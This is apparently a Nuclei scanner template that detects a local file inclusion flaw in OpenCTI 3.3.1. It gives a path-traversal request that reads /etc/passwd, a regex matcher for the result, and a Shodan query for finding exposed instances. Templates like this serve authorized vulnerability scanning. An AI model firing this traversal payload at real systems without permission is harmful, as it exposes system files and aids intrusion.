id: opencti-lfi

info:
  name: OpenCTI 3.3.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: OpenCTI 3.3.1 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2020060078
    - https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"OpenCTI"
  tags: opencti,lfi,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a004830460221008c730bcfdaca51464fed1d9ef4def38db9b2ca66238ac9e86925925de3423cd10221008c3a5fa0c5bdfc0eb241cdbb28dba3c209716deadea17ecb19ae2363d5ff8380:922c64590222798bb761d5b6d8e72950
